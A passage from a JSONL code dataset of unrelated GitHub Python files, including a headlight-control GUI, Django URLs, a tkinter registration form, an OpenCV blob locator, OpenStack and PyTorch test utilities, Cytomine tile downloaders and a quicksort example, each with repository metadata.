ShortLights()\n cv2.putText(original_frame, \"uyari\", (50, 150), \n font, 0.8, textColor, 2, cv2.LINE_AA) \n cv2.putText(original_frame, dayEstimationStringAlias, (50, 50), \n font, 0.8, textColor, 2, cv2.LINE_AA)\n cv2.putText(original_frame, MotionAlias, (50, 100), \n font, 0.8, textColor, 2, cv2.LINE_AA) \n cv2.moveWindow('origin', 680,30)\n cv2.imshow('origin',original_frame)\n LightSourceDetectionCount = 0\n ListSourceSize = (0,0)\n frameID += 1\n k = cv2.waitKey(30) & 0xff\n if k == 27:\n cap.release()\n cv2.destroyAllWindows()\n break\n else:\n break\n else: \n PrintScreen(\"Henüz Dosya Seçmediniz\")\n\nComfields = ('COM port', 'Baudrate')\n\ndef makeform(root, fields):\n entries = {}\n for field in fields:\n print(field)\n row = tk.Frame(root)\n lab = tk.Label(row, width=22, text=field+\": \", anchor='w')\n ent = tk.Entry(row)\n ent.insert(0, \"0\")\n row.pack(side=tk.TOP, \n fill=tk.X, \n padx=5, \n pady=5)\n lab.pack(side=tk.LEFT)\n ent.pack(side=tk.RIGHT, \n expand=tk.YES, \n fill=tk.X)\n entries[field] = ent\n return entries\n\nConnected = False\nReading = False\nMicrocontrollerSerial = serial.Serial()\ndef CheckMicrocontrollerCom():\n global Connected\n global MicrocontrollerSerial\n if not Connected:\n portName = \"COM\" + str(GetComValues.ComPortNumber)\n MicrocontrollerSerial = serial.Serial(portName, GetComValues.ComPortBaudRate)\n time.sleep(1) #give the connection a second to settle str.encode(\"Hello\")\n Connected = True\n firstMessage = threading.Thread( target=StartListening, args= ( ))\n firstMessage.start()\n \n\n\ndef StartListening():\n global Reading\n if not Reading:\n global MicrocontrollerSerial\n Reading = True\n while True:\n data = MicrocontrollerSerial.read()\n if(data):\n print(data)\n\ndef VideoAdd():\n ChooseVideo()\n\ndef StartTravel():\n ProcessTravel(False)\n\ndef GetComValues(entries):\n GetComValues.ComPortNumber = int(entries['COM port'].get()) if check_int(entries['COM port'].get()) else 0 \n GetComValues.ComPortBaudRate =int(entries['Baudrate'].get()) if check_int(entries['Baudrate'].get()) else 0 \n\n\ndef SetupEmbeded():\n rootInput = tk.Tk()\n ents = makeform(rootInput, Comfields)\n b1 = tk.Button(rootInput, text='Değerleri Kaydet',\n command=(lambda e=ents: GetComValues(e)))\n b1.pack(side=tk.LEFT, padx=5, pady=5)\n #b2 = tk.Button(rootInput, text='Kapat', command=rootInput.quit)\n #b2.pack(side=tk.LEFT, padx=5, pady=5)\n rootInput.mainloop()\n\ndef StartWithEmbeded():\n CheckMicrocontrollerCom()\n ProcessTravel(True)\n\ndef LongLights():\n CheckMicrocontrollerCom()\n global MicrocontrollerSerial\n MicrocontrollerSerial.write('u'.encode())\n\ndef ShortLights():\n CheckMicrocontrollerCom()\n global MicrocontrollerSerial\n MicrocontrollerSerial.write('k'.encode())\n\ndef DayLights():\n CheckMicrocontrollerCom()\n global MicrocontrollerSerial\n MicrocontrollerSerial.write('g'.encode())\n\ndef CloseLights():\n CheckMicrocontrollerCom()\n global MicrocontrollerSerial\n MicrocontrollerSerial.write('y'.encode())\n\nButton(tool_bar, text=\"Video Seçimi Yap\",command=VideoAdd,bg='brown',fg='white').grid(row=1, column=0, padx=5, pady=5)\nButton(tool_bar, text=\"Yola Çık\",command=StartTravel,bg='brown',fg='white').grid(row=2, column=0, padx=5, pady=5)\nButton(tool_bar, text=\"Gömülü Sistlem ayarla\",command=SetupEmbeded,bg='brown',fg='white').grid(row=3, column=0, padx=5, pady=5)\nButton(tool_bar, text=\"Gömülü ile Yola Çık\",command=StartWithEmbeded,bg='brown',fg='white').grid(row=4, column=0, padx=5, pady=5)\nButton(tool_bar, text=\"Uzun Farları Yak\",command=LongLights,bg='brown',fg='white').grid(row=5, column=0, padx=5, pady=5)\nButton(tool_bar, text=\"Kısa Farları Yak\",command=ShortLights,bg='brown',fg='white').grid(row=6, column=0, padx=5, pady=5)\nButton(tool_bar, text=\"Gündüz Farları Yak\",command=DayLights,bg='brown',fg='white').grid(row=7, column=0, padx=5, pady=5)\nButton(tool_bar, text=\"Tüm Farları Kapat\",command=CloseLights,bg='brown',fg='white').grid(row=8, column=0, padx=5, pady=5)\nroot.mainloop()","repo_name":"erenokur/python-automotive-auto-lighting","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":16316,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"39915123150","text":"from django.contrib import admin\nfrom django.urls import path\nfrom django.conf.urls import include\n\nfrom rest_framework import routers, permissions\n\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\n\nfrom ingredient.views import IngredientViewSet\nfrom shopping.views import ShoppingListViewSet, ShoppingListItemViewSet\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"Snippets API\",\n default_version='v1',\n description=\"Test description\",\n terms_of_service=\"https://www.google.com/policies/terms/\",\n contact=openapi.Contact(email=\"contact@snippets.local\"),\n license=openapi.License(name=\"BSD License\"),\n ),\n public=True,\n permission_classes=[permissions.AllowAny],\n)\n\nrouter = routers.SimpleRouter()\nrouter.register(r'ingredients', IngredientViewSet, basename='Ingredient')\nrouter.register(r'shoppinglists', ShoppingListViewSet, basename='ShoppingList')\nrouter.register(r'shoppinglistitems', ShoppingListItemViewSet, basename='ShoppingListItem')\n\nurlpatterns = [\n path('swagger/', schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger-ui'),\n path('admin/', admin.site.urls),\n path('api/', include(router.urls))\n]\n","repo_name":"thomashbrnrd/backend-developer-test","sub_path":"backend_test/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34809516599","text":"from asyncio.windows_events import NULL\nfrom tkinter import *\nfrom Database import funciones\nfrom tkinter.messagebox import showerror, showinfo, showwarning\nfrom tkinter import ttk\n\ndef registrarEstudiante():\n\n carrerasDict = {}\n y2 = Frame()\n y2.place(x=0, y=0, width=500, height=1000)\n y2.config(background = \"#213141\")\n y3 = Label(y2, text=\"REGISTRAR ESTUDIANTE\",bg='black', fg='white', width=25,font=(\"bold\", 22))\n y3.place(x=40, y=60)\n\n # Creating FullName\n b = Label(y2, text=\"ID:\", width=20, font=(\"bold\", 12))\n b.place(x=75, y=130)\n # Creating Entry For FullName\n b1 = Entry(y2)\n b1.place(x=300, y=130)\n\n # Creating CI\n c = Label(y2, text=\"CI:\", width=20, font=(\"bold\", 12))\n c.place(x=75, y=180)\n # Creating Entry For CI\n c1 = Entry(y2)\n c1.place(x=300, y=180)\n\n # Creating NOMBRE\n d = Label(y2, text=\"NOMBRE:\", width=20, font=(\"bold\", 12))\n d.place(x=75, y=230)\n # Creating Entry For NOMBRE\n d1 = Entry(y2)\n d1.place(x=300, y=232)\n\n # Creating DIRECCION\n e = Label(y2, text=\"DIRECCION:\", width=20, font=(\"bold\", 12))\n e.place(x=75, y=280)\n # Creating Entry For DIRECCION\n e1 = Entry(y2)\n e1.place(x=300, y=280)\n\n # Creating NOMBRE CARRERA\n f = Label(y2, text=\"ID CARRERA:\", width=20, font=('bold', 12))\n f.place(x=75, y=330)\n # Creating Entry For NOMBRE CARRERA\n\n # Combobox creation\n n = StringVar()\n monthchoosen = ttk.Combobox(y2, state=\"readonly\", width = 20, textvariable = n)\n monthchoosen.place(x=300, y=332)\n # Adding combobox drop down list\n def getCarreras():\n res = funciones.selectCarrera()\n carrerasName=[]\n for i in res:\n if i[1] not in carrerasDict:\n carrerasDict[i[1]]=i[0]\n carrerasName.append(i[1])\n monthchoosen['values'] = carrerasName\n getCarreras()\n monthchoosen.current()\n\n # Creating Confirm EDAD\n g = Label(y2, text=\"EDAD:\", width=20, font=('bold', 12))\n g.place(x=75, y=380)\n # Creating Entry For Confirm EDAD\n g1 = Entry(y2)\n g1.place(x=300, y=382)\n def callback():\n if(b1.get()=='' and n.get()==''):\n showwarning(\"Arquitectura empresarial\", \"ID y CARRERA son campos requeridos\") \n elif(b1.get()==''):\n showwarning(\"Arquitectura empresarial\", \"ID es un campo requerido\") \n elif(n.get()==''):\n showwarning(\"Arquitectura empresarial\", \"CARRERA es un campo requerido\") \n else:\n if(funciones.validarID(b1.get())):\n showwarning(\"Arquitectura empresarial\", f\"El ID {b1.get()} ya se encuentra registrado\") \n else:\n dict = {\n \"ID\":\"'\"+b1.get()+\"'\",\n \"CI\":(\"'\"+c1.get()+\"'\" if c1.get()!='' else \"'NULL'\"),\n \"NOMBRE\":(\"'\"+d1.get()+\"'\" if d1.get()!='' else \"'NULL'\"),\n \"DIRECCION\":(\"'\"+e1.get()+\"'\" if e1.get()!='' else \"'NULL'\"),\n \"CARRERA\":\"'\"+carrerasDict[n.get()]+\"'\",\n \"EDAD\":(\"'\"+g1.get()+\"'\" if g1.get()!='' else \"NULL\")\n }\n try:\n res = funciones.registerEstudiante(dict[\"ID\"],dict[\"CI\"], dict[\"NOMBRE\"], dict[\"DIRECCION\"],dict[\"CARRERA\"],dict[\"EDAD\"])\n if(res[\"status\"]==1):\n showinfo(\"Arquitectura empresarial\", res[\"message\"])\n y2.destroy()\n except Exception as ex:\n print(ex)\n showerror(\"Arquitectura empresarial\", \"Ocurrio un error al registrar estudiante\")\n\n Button(y2, text='SUBMIT', width=20, bg=\"#04d616\", fg='white', command=callback).place(x=180, y=420)\n\n\n Button(y2, text='RETURN', width=20, bg=\"#cd5656\", fg='white', command=lambda:[y2.destroy()]).place(x=180, y=460)\n","repo_name":"dgonzalezt2/MSSQL_with_PythonGUI","sub_path":"GUI/views/student/registrar.py","file_name":"registrar.py","file_ext":"py","file_size_in_byte":3827,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"74327657511","text":"import numpy as np\nimport cv2\nimport math\nimport time\n\n\nclass Mask:\n\n def __init__(self, image_name):\n\n self.image_name = image_name\n image = cv2.imread(self.image_name)\n self.image_data = np.asarray(image)\n self.image_subsets = list()\n self.image_approx = None\n [self.shape_x, self.shape_y, self.shape_z] = self.image_data.shape\n self.max_pixels = None\n centre_x = float(self.shape_y / 2)\n centre_y = float(self.shape_x / 2)\n self.centre = [centre_x, centre_y]\n\n # x is the rows, y the columns and z is the depth.\n\n def fifth_iteration(self, red, green, subtracting=True):\n image = self.process(red, green, subtracting)\n output = self.gaussian_blur(image, 101)\n cv2.imwrite('Images/Showcase6_Blurred_Circle_0.75.jpg', output)\n [distance, theta, theta_2] = self.direction_finding()\n return distance, theta, theta_2\n\n def process(self, red, green, subtracting):\n blue_layer = self.image_data.copy()\n\n if subtracting:\n blue_layer[:, :, 0] = blue_layer[:, :, 0] - (red * blue_layer[:, :, 1] + green * blue_layer[:, :, 2])\n blue_layer[:, :, 0][blue_layer[:, :, 0] < 0] = 0\n\n for i in range(1, 3):\n blue_layer[:, :, i] = np.zeros([self.shape_x, self.shape_y])\n image = cv2.cvtColor(blue_layer, code=cv2.COLOR_BGR2GRAY)\n # cv2.imwrite('Showcase4_Processed_0.5.jpg', image)\n return image\n\n def gaussian_blur(self, image, radius):\n image = cv2.GaussianBlur(image, (radius, radius), 0)\n (minVal, maxVal, minLoc, maxLoc) = cv2.minMaxLoc(image)\n self.max_pixels = [float(maxLoc[0]), float(maxLoc[1])]\n image = self.image_data.copy()\n cv2.circle(image, maxLoc, radius, (255, 0, 0), 20)\n centre_coord = [int(x) for x in self.centre]\n cv2.circle(image, tuple(centre_coord), radius, (0, 255, 0), 20)\n return image\n\n def direction_finding(self):\n distance = int(math.dist(self.centre, self.max_pixels))\n\n difference = []\n\n zip_ob = zip(self.centre, self.max_pixels)\n for list1_i, list2_i in zip_ob:\n difference.append(list2_i - list1_i)\n\n diff_arr = np.array(difference)\n theta = np.arctan2(diff_arr[1], diff_arr[0]) * 180 / np.pi\n theta_2 = np.arctan2(distance, 1000) * 180 / np.pi\n\n return distance, theta, theta_2\n\n\ndef test_fifth_iteration():\n mask = Mask('Images/Test 2.jpg')\n distance, theta, theta_2 = mask.fifth_iteration(red=0.75, green=0.75)\n return distance, theta, theta_2\n\ntimes = []\nfor i in range(3):\n\n start = time.time()\n print(test_fifth_iteration())\n end = time.time()\n elapsed_time = end - start\n times.append(elapsed_time)\n\nprint(times)\nprint(sum(times)/3)\n\n\n","repo_name":"jamminson/CANSAT","sub_path":"Iteration_5.py","file_name":"Iteration_5.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29178647105","text":"import testtools\n\nfrom tempest.common.utils.linux.remote_client import RemoteClient\nimport tempest.config\nfrom tempest.test import attr\nfrom tempest.tests.compute import base\n\n\nclass AttachVolumeTestJSON(base.BaseComputeTest):\n _interface = 'json'\n run_ssh = tempest.config.TempestConfig().compute.run_ssh\n\n def __init__(self, *args, **kwargs):\n super(AttachVolumeTestJSON, self).__init__(*args, **kwargs)\n self.server = None\n self.volume = None\n self.attached = False\n\n @classmethod\n def setUpClass(cls):\n super(AttachVolumeTestJSON, cls).setUpClass()\n cls.device = 'vdb'\n\n def _detach(self, server_id, volume_id):\n self.servers_client.detach_volume(server_id, volume_id)\n self.volumes_client.wait_for_volume_status(volume_id, 'available')\n\n def _delete(self, volume):\n if self.volume:\n self.volumes_client.delete_volume(self.volume['id'])\n self.volume = None\n\n def _create_and_attach(self):\n # Start a server and wait for it to become ready\n resp, server = self.create_server(wait_until='ACTIVE',\n adminPass='password')\n\n # Record addresses so that we can ssh later\n resp, server['addresses'] = \\\n self.servers_client.list_addresses(server['id'])\n\n # Create a volume and wait for it to become ready\n resp, volume = self.volumes_client.create_volume(1,\n display_name='test')\n self.volume = volume\n self.volumes_client.wait_for_volume_status(volume['id'], 'available')\n\n # Attach the volume to the server\n self.servers_client.attach_volume(server['id'], volume['id'],\n device='/dev/%s' % self.device)\n self.volumes_client.wait_for_volume_status(volume['id'], 'in-use')\n\n self.attached = True\n\n @attr(type='positive')\n @testtools.skipIf(not run_ssh, 'SSH required for this test')\n def test_attach_detach_volume(self):\n # Stop and Start a server with an attached volume, ensuring that\n # the volume remains attached.\n try:\n self._create_and_attach()\n server = self.server\n volume = self.volume\n\n self.servers_client.stop(server['id'])\n self.servers_client.wait_for_server_status(server['id'], 'SHUTOFF')\n\n self.servers_client.start(server['id'])\n self.servers_client.wait_for_server_status(server['id'], 'ACTIVE')\n\n linux_client = RemoteClient(server,\n self.ssh_user, server['adminPass'])\n partitions = linux_client.get_partitions()\n self.assertTrue(self.device in partitions)\n\n self._detach(server['id'], volume['id'])\n self.attached = False\n\n self.servers_client.stop(server['id'])\n self.servers_client.wait_for_server_status(server['id'], 'SHUTOFF')\n\n self.servers_client.start(server['id'])\n self.servers_client.wait_for_server_status(server['id'], 'ACTIVE')\n\n linux_client = RemoteClient(server,\n self.ssh_user, server['adminPass'])\n partitions = linux_client.get_partitions()\n self.assertFalse(self.device in partitions)\n except Exception:\n self.fail(\"The test_attach_detach_volume is faild!\")\n finally:\n if self.attached:\n self._detach(server['id'], volume['id'])\n # NOTE(maurosr): here we do the cleanup for volume, servers are\n # dealt on BaseComputeTest.tearDownClass\n self._delete(self.volume)\n\n\nclass AttachVolumeTestXML(AttachVolumeTestJSON):\n _interface = 'xml'\n","repo_name":"rvbelapure/openstack-nova-sched","sub_path":"tempest/tempest/tests/compute/volumes/test_attach_volume.py","file_name":"test_attach_volume.py","file_ext":"py","file_size_in_byte":3820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40240887349","text":"import os\nimport numpy as np\n\nfrom skimage.io import imread\nfrom abc import abstractmethod\nfrom cytomine import Cytomine\nfrom cytomine.models._utilities import parallel\nfrom sldc import Tile, TileExtractionException, TileTopology, alpha_rasterize\nfrom sldc_cytomine import CytomineSlide\n\n\nclass CytomineDownloadableTile(Tile):\n \"\"\"An abstract tile implementation that downloads the tile from a server and caches it in a local folder\"\"\"\n def __init__(self, working_path, parent, offset, width, height, tile_identifier=None, polygon_mask=None):\n Tile.__init__(self, parent, offset, width, height, tile_identifier=tile_identifier, polygon_mask=polygon_mask)\n self._working_path = working_path\n\n @abstractmethod\n def download_tile_image(self):\n pass \n\n @property\n def cache_filename(self):\n image_instance = self.base_image.image_instance\n x, y, width, height = self.abs_offset_x, self.abs_offset_y, self.width, self.height\n zoom = self.base_image.zoom_level\n cache_filename_format = \"{id}-{zoom}-{x}-{y}-{w}-{h}.png\"\n return cache_filename_format.format(id=image_instance.id, x=x, y=y, w=width, h=height, zoom=zoom)\n\n @property\n def cache_filepath(self):\n return os.path.join(self._working_path, self.cache_filename)\n\n @property\n def np_image(self):\n try:\n if not os.path.exists(self.cache_filepath) and not self.download_tile_image():\n raise TileExtractionException(\"Cannot fetch tile at for '{}'.\".format(self.cache_filename))\n\n np_array = imread(self.cache_filepath)\n\n # if np_array.shape[:2] != (self.height, self.width) or np_array.shape[2] != self.base_image.channels:\n # raise TileExtractionException(\"Fetched image has invalid size : {} instead \"\n # \"of {}\".format(np_array.shape, (self.width, self.height, self.channels)))\n\n if np_array.shape[2] == 4:\n np_array = np_array[:, :, 3]\n np_array = np_array.astype(\"uint8\")\n return self.add_polygon_mask(np_array)\n except IOError as e:\n raise TileExtractionException(str(e))\n\n def add_polygon_mask(self, image):\n try:\n return alpha_rasterize(image, self.polygon_mask)\n except:\n return image\n\n\nclass CytomineZoomifyTile(CytomineDownloadableTile):\n \"\"\"Tile fetch using the Zoomify protocol (for older Cytomine versions)\"\"\"\n def download_tile_image(self):\n slide = self.base_image\n col_tile = self.abs_offset_x // 256\n row_tile = self.abs_offset_y // 256\n _slice = slide.image_instance\n response = Cytomine.get_instance().get('imaging_server.json', None)\n imageServerUrl = response['collection'][0]['url']\n return Cytomine.get_instance().download_file(imageServerUrl + \"/image/tile\", self.cache_filepath, False, payload={\n \"zoomify\": _slice.fullPath,\n \"mimeType\": _slice.mime,\n \"x\": col_tile,\n \"y\": row_tile,\n \"z\": slide.api_zoom_level\n })\n\n\nclass CytomineIIPTile(CytomineDownloadableTile):\n def download_tile_image(self):\n slide = self.base_image\n if not isinstance(slide, CytomineSlide):\n raise TypeError(f\"CytomineIIP tile should be used in conjunction with CytomineSlide only (as base image), found `{type(slide)}`\")\n iip_topology = TileTopology(slide, None, max_width=256, max_height=256, overlap=0)\n col_tile = self.abs_offset_x // 256\n row_tile = self.abs_offset_y // 256\n iip_tile_index = col_tile + row_tile * iip_topology.tile_horizontal_count\n _slice = slide.slice_instance\n return Cytomine.get_instance().download_file(_slice.imageServerUrl + \"/slice/tile\", self.cache_filepath, False, payload={\n \"fif\": _slice.path,\n \"mimeType\": _slice.mime,\n \"tileIndex\": iip_tile_index,\n \"z\": slide.api_zoom_level\n })\n\n\nclass CytominePimsTile(CytomineDownloadableTile):\n \"\"\"Tile fetch using the Zoomify protocol (for older Cytomine versions)\"\"\"\n def download_tile_image(self):\n slide = self.base_image\n if not isinstance(slide, CytomineSlide):\n raise TypeError(f\"CytominePims tile should be used in conjunction with CytomineSlide only (as base image), found `{type(slide)}`\")\n iip_topology = TileTopology(slide, None, max_width=256, max_height=256, overlap=0)\n col_tile = self.abs_offset_x // 256\n row_tile = self.abs_offset_y // 256\n tile_index = col_tile + row_tile * iip_topology.tile_horizontal_count\n _slice = slide.slice_instance\n zoom = self.base_image.image_instance.zoom - slide.zoom_level\n return Cytomine.get_instance().download_file(f\"{_slice.imageServerUrl}/image/{_slice.path}/normalized-tile/zoom/{zoom}/ti/{tile_index}.jpg\", self.cache_filepath, False, payload={\n \"z_slices\": \"0\",\n \"timepoints\": \"0\",\n \"channels\": \"0,1,2\",\n \"colormaps\": \"#f00,#0f0,#00f\",\n })\n\n\nclass CytomineWindowTile(CytomineDownloadableTile):\n \"\"\"Tiling using the window service\"\"\"\n def download_tile_image(self):\n return self.base_image.image_instance.window(\n x=self.abs_offset_x,\n y=self.abs_offset_y,\n w=self.width,\n h=self.height,\n dest_pattern=self.cache_filepath\n )\n\n\nclass CytomineTile(Tile):\n def __init__(self, working_path, parent, offset, width, height, tile_class=CytomineIIPTile, tile_identifier=None, polygon_mask=None, n_jobs=1):\n \"\"\"A abritrarily sized cytomine tile. Will be re-constructed by fetching smaller tiles using the specified\n protocol.\n\n Parameters\n ----------\n parent: Image\n The image from which is extracted the tile\n offset: (int, int)\n The x and y coordinates of the pixel at the origin point of the slide in the parent image.\n Coordinates order is the following : (x, y).\n width: int\n The width of the tile\n height: int\n The height of the tile\n tile_class: class\n A subclass of 'CytomineDownloadableTile', specifies the download protocol for underlying tiles.\n The current tile will be built by downloading non-overlapping 256x256 tiles using the given protocol and\n assembling them into the expected tile. By default, uses IIP through Cytomine API (class `CytomineIIPTile`).\n tile_identifier: int, optional (default: None)\n A integer identifier that identifies uniquely the tile among a set of tiles\n polygon_mask: Polygon (optional, default: None)\n The polygon representing the alpha mask to apply to the tile window\n\n\n Notes\n -----\n The coordinates origin is the leftmost pixel at the top of the slide\n \"\"\"\n Tile.__init__(self, parent, offset, width, height, tile_identifier=tile_identifier, polygon_mask=polygon_mask)\n self._working_path = working_path\n self._n_jobs = n_jobs\n self._tile_class = tile_class\n os.makedirs(working_path, exist_ok=True)\n\n def _pad_iip_tile(self, img):\n padding = [(0, 256 - img.shape[0]), (0, 256 - img.shape[1])]\n if img.ndim == 3:\n padding += [(0, 0)]\n return np.pad(img, padding, mode='constant', constant_values=0)\n\n def _iip_window(self):\n left_margin = self.abs_offset_x % 256\n top_margin = self.abs_offset_y % 256\n right_margin = 256 - (self.abs_offset_x + self.width) % 256\n bottom_margin = 256 - (self.abs_offset_y + self.height) % 256\n margins = [top_margin, left_margin, bottom_margin, right_margin]\n \n offset = self.abs_offset_x - left_margin, self.abs_offset_y - top_margin\n width = self.width + left_margin + right_margin\n height = self.height + top_margin + bottom_margin\n window = self.base_image.window(offset=offset, max_width=width, max_height=height)\n\n return window, offset, (width, height), margins\n\n @property\n def np_image(self):\n from sldc_cytomine.tile_builder import CytomineGenericTileBuilder\n window, _, (width, height), margins = self._iip_window()\n builder = CytomineGenericTileBuilder(self._tile_class, self._working_path)\n topology = TileTopology(window, builder, max_width=256, max_height=256, overlap=0)\n\n def download_tile(tile):\n return tile.np_image\n\n rebuilt = np.zeros([height, width, self.base_image.channels], dtype=np.uint8)\n for tile, tile_image in parallel.generic_download(list(topology), download_tile, n_workers=self._n_jobs):\n y_start, x_start = tile.offset_y, tile.offset_x\n y_end, x_end = y_start + 256, x_start + 256\n rebuilt[y_start:y_end, x_start:x_end] = self._pad_iip_tile(tile_image)\n\n return rebuilt[margins[0]:-margins[2], margins[1]:-margins[3]]\n\n def fetch_subtiles(self):\n \"\"\"fetch underlying tiles without loading them into memory\"\"\"\n from sldc_cytomine.tile_builder import CytomineGenericTileBuilder\n window, _, _, _ = self._iip_window()\n builder = CytomineGenericTileBuilder(self._tile_class, self._working_path)\n topology = TileTopology(window, builder, max_width=256, max_height=256, overlap=0)\n \n def download_tile(tile: CytomineDownloadableTile):\n return tile.download_tile_image()\n\n _ = parallel.generic_download(list(topology), download_tile, n_workers=self._n_jobs)","repo_name":"waliens/sldc-cytomine","sub_path":"sldc_cytomine/tile.py","file_name":"tile.py","file_ext":"py","file_size_in_byte":8947,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"22140991190","text":"from setuptools import setup, find_packages\nimport os\n\n# Utility function to read the README file.\n# Used for the long_description. It's nice, because now 1) we have a top level\n# README file and 2) it's easier to type in the README file than to put a raw\n# string in below ...\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nsetup(\n name='geodjango-uscampgrounds',\n version='2.0',\n description='A set of Django models to store the data files from uscampgrounds.info',\n author='Adam Fast',\n author_email='adamfast@gmail.com',\n url='https://github.com/adamfast/geodjango-uscampgrounds',\n packages=find_packages(),\n include_package_data=True,\n zip_safe=False,\n long_description=read('README.txt'),\n license = \"BSD\",\n keywords = \"django geodjango\",\n classifiers = [\n \"Development Status :: 5 - Production/Stable\",\n \"Environment :: Web Environment\",\n \"Framework :: Django\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: BSD License\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Topic :: Internet :: WWW/HTTP\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n ],\n)\n","repo_name":"adamfast/geodjango-uscampgrounds","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"42667762302","text":"#퀵정렬 : 기준 데이터 설정 -> 그 기준보다 큰 데이터와 작은 데이터의 위치 바꿈\n#시간복잡도 : O(NlogN) \n##basic : 첫 번째 데이터를 기준 데이터(pivot)으로 설정\n\narray = [5,7,9,0,3,1,6,2,4,8]\n\ndef quick_sort(array, start, end) :\n if start >= end :\n return\n pivot = start\n left = start+1\n right = end\n while(left<=right) :\n while(left<=end and array[left] <= array[pivot]) :\n left+=1\n\n while(right>start and array[right] >= array[pivot]) :\n right -=1\n if (left>right) :\n array[right], array[pivot] = array[pivot], array[right]\n\n else :\n array[left], array[right] = array[right], array[left]\n quick_sort(array, start, right-1)\n quick_sort(array, right+1, end)\nquick_sort(array, 0, len(array)-1)\nprint(array)","repo_name":"parkjeongmi/jamie_study","sub_path":"sort/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14821936969","text":"import re\nimport torch\n\n\"\"\"\nInstructions:\n\n1. pytest -n 8 test/test_vmap.py test/test_ops.py test/test_aotdispatch.py > result.txt\n2. python test/xfail_suggester.py\n\"\"\"\n\nwith open('result.txt') as f:\n lines = f.readlines()\n\nfailed = [line for line in lines if line.startswith('FAILED')]\np = re.compile('FAILED test/test_\\w+.py::\\w+::(\\S+)') # noqa: W605\n\n\ndef get_failed_test(line):\n m = p.match(line)\n if m is None:\n return None\n return m.group(1)\n\n\nbase_names = {\n 'test_grad_',\n 'test_vjp_',\n 'test_vmapvjp_',\n 'test_vmapvjp_has_batch_rule_',\n 'test_vjpvmap_',\n 'test_jvp_',\n 'test_vmapjvp_',\n 'test_vmapjvpall_has_batch_rule_',\n 'test_vmapjvpall_',\n 'test_jvpvjp_',\n 'test_vjpvjp_',\n 'test_decomposition_',\n 'test_make_fx_exhaustive_',\n 'test_vmap_exhaustive_',\n 'test_op_has_batch_rule_',\n 'test_vmap_autograd_grad_',\n}\n\nfailed_tests = [get_failed_test(line) for line in lines]\nfailed_tests = [match for match in failed_tests if match is not None]\nfailed_tests = sorted(failed_tests)\n\nsuggested_xfails = {}\n\n\ndef remove_device_dtype(test):\n return '_'.join(test.split('_')[:-2])\n\n\ndef belongs_to_base(test, base):\n if not test.startswith(base):\n return False\n candidates = [try_base for try_base in base_names if len(try_base) > len(base)]\n for candidate in candidates:\n if test.startswith(candidate):\n return False\n return True\n\n\ndef parse_namespace(base):\n mappings = {\n 'nn_functional_': 'nn.functional',\n 'fft_': 'fft',\n 'linalg_': 'linalg',\n '_masked_': '_masked',\n 'sparse_': 'sparse',\n 'special_': 'special',\n }\n for heading in mappings.keys():\n if base.startswith(heading):\n return mappings[heading], base[len(heading):]\n return None, base\n\n\ndef get_torch_module(namespace):\n if namespace is None:\n return torch\n if namespace == 'nn.functional':\n return torch.nn.functional\n return getattr(torch, namespace)\n\n\ndef parse_base(base):\n namespace, rest = parse_namespace(base)\n\n apis = dir(get_torch_module(namespace))\n apis = sorted(apis, key=lambda x: -len(x))\n\n api = rest\n variant = ''\n for candidate in apis:\n if rest.startswith(candidate):\n api = candidate\n variant = rest[len(candidate) + 1:]\n break\n print(base, namespace, api, variant)\n return namespace, api, variant\n\n\ndef any_starts_with(strs, thing):\n for s in strs:\n if s.startswith(thing):\n return True\n return False\n\n\ndef get_suggested_xfails(base, tests):\n result = []\n tests = [test[len(base):] for test in tests if\n belongs_to_base(test, base)]\n\n base_tests = {remove_device_dtype(test) for test in tests}\n tests = set(tests)\n for base in base_tests:\n cpu_variant = base + '_cpu_float32'\n cuda_variant = base + '_cuda_float32'\n namespace, api, variant = parse_base(base)\n if namespace is None:\n api = api\n else:\n api = f'{namespace}.{api}'\n if cpu_variant in tests and cuda_variant in tests:\n result.append(f\"xfail('{api}', '{variant}'),\")\n continue\n if cpu_variant in tests:\n result.append(f\"xfail('{api}', '{variant}', device_type='cpu'),\")\n continue\n if cuda_variant in tests:\n result.append(f\"xfail('{api}', '{variant}', device_type='cuda'),\")\n continue\n result.append(f\"skip('{api}', '{variant}',\")\n return result\n\n\nresult = {base: get_suggested_xfails(base, failed_tests) for base in base_names}\nfor k, v in result.items():\n print('=' * 50)\n print(k)\n print('=' * 50)\n print('\\n'.join(v))\n","repo_name":"pytorch/pytorch","sub_path":"test/functorch/xfail_suggester.py","file_name":"xfail_suggester.py","file_ext":"py","file_size_in_byte":3756,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"42604813707","text":"from dataclasses import dataclass\nimport os\nimport re\nimport shutil\nimport sys\n\n\n@dataclass\nclass WikiText(object):\n\n def to_json(self):\n obj = {\n 'type': self.__class__.__name__,\n 'fields': {}\n }\n for k, v in self.__dict__.items():\n if isinstance(v, WikiText):\n obj['fields'][k] = v.to_json()\n elif isinstance(v, list):\n obj['fields'][k] = [x.to_json() for x in v]\n else:\n obj['fields'][k] = v\n 